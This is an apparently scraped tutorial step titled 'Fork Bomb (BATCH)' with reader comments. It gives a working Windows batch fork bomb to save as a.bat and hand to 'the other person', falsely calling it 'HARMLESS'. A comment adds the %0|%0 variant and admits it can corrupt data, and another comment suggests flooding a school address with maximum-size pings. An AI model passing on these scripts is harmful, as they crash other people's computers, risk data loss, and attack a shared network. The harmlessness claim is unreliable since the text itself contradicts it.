Step 4Fork Bomb (BATCH)
!!!!THIS IS HARMLESS AND WILL DO NO DAMAGE TO YOUR COMPUTER!!!!!
To make this open note pad and type:
@echo off
:START
start a.bat
GOTO START
The code above must be saved as a.bat and when the other person opens it nothing will appear but in the background it will keep opening its self until the computer freezes or shuts down.
| « Previous Step | Download PDFView All Steps | Next Step » |









































%0|%0
It will essentially do the same thing, only it will duplicate so rapidly, it is very difficult to kill the process before it takes over the entire system.
And while this prank is nominally harmless, it will crash the system, which can easily cause data corruption on Windows.
See this page.....also....the break key on your keyboard should do the trick also...
start batchfile.bat
and save it as batchfile.bat
ping -t yourschooladdress
"ping -t - l 65500 address" (its L)
increase the ping package to 65500 bytes tha maximum of ping package size.
if u get time out or any error message, try to reduce the value.